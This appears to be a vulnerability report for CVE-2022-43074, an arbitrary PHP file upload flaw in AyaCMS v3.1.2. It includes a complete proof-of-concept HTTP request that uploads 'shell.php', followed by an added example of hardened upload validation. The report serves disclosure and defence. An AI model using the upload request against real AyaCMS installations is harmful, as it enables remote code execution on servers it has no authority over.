CVE-2022-43074: AyaCMS v3.1.2 has an Arbitrary File Upload Vulnerability · Issue #3 · loadream/AyaCMS
AyaCMS v3.1.2 was discovered to contain an arbitrary file upload vulnerability via the component /admin/fst_upload.inc.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.
Vulnerable path: /aya/module/admin/fst_upload.inc.php
Lines 11-15 of the "fst_upload.inc.php" file do not validate the uploaded file's name suffix or its content, so arbitrary files can be uploaded, resulting in arbitrary code execution.
Vulnerability exploitation process:
POST /admin.php?action=fst_upload&file= HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------19139953963909426187499573422
Content-Length: 253
Origin: http://127.0.0.1:8080
Connection: close
Referer: http://127.0.0.1:8080/admin.php?action=fst
Cookie: PHPSESSID=df5df4jinm0nvp4vfkm6t3fjr1; amsg=; aclass=; aya_template=pc; aya_auth=V2UQGA8%2BEiJCfV87V2ZTVl9vDD4MOEckT3cEahZ4UmpAIRYmCz0CMlA3XWdBJ0IoW24AMQtuVDVXPgM5BGJba1cxECkPOxJ%2BQiVfYFcxU24
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------19139953963909426187499573422
Content-Disposition: form-data; name="upfile"; filename="shell.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------19139953963909426187499573422--
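The two checks the report says are missing (file name suffix and file content), sketched as an added example that is not AyaCMS code and not part of the original report. The function name `safe_upload_name`, the allowlist and the sample files are assumptions made for illustration.

```php
<?php
// Added example: hypothetical hardened upload check, not AyaCMS code.
const ALLOWED = [            // extension => MIME type the content must sniff as
    'png' => 'image/png',
    'jpg' => 'image/jpeg',
    'gif' => 'image/gif',
];

/** Returns a server-chosen file name, or throws if the upload is not an allowed image. */
function safe_upload_name(string $clientName, string $tmpPath): string
{
    // 1. Allowlist on the final extension of the client-supplied name.
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        throw new RuntimeException("extension not allowed: '$ext'");
    }
    // 2. Sniff the bytes; the request's Content-Type header is client-controlled.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if ($mime !== ALLOWED[$ext]) {
        throw new RuntimeException("content is $mime, expected " . ALLOWED[$ext]);
    }
    // 3. Never reuse the client's name: random base name plus the vetted extension.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed sample inputs, written to temp files so the check runs from the CLI.
$png = "\x89PNG\r\n\x1a\n\x00\x00\x00\x0dIHDR" . pack('NN', 1, 1) . "\x08\x06\x00\x00\x00";
$php = '<?php phpinfo();?>';
$cases = [
    ['shell.php', $php],   // the file part from the request above
    ['shell.png', $php],   // PHP content under an image extension
    ['logo.png',  $png],   // genuine PNG header
];
foreach ($cases as [$name, $bytes]) {
    $tmp = tempnam(sys_get_temp_dir(), 'up');
    file_put_contents($tmp, $bytes);
    try {
        echo "$name -> stored as ", safe_upload_name($name, $tmp), "\n";
    } catch (RuntimeException $e) {
        echo "$name -> rejected: ", $e->getMessage(), "\n";
    } finally {
        unlink($tmp);
    }
}
```

In a real handler this check would run only after `is_uploaded_file()` succeeds on `$_FILES['upfile']['tmp_name']`, and the file would then be passed to `move_uploaded_file()` with a destination directory from which the web server does not execute PHP.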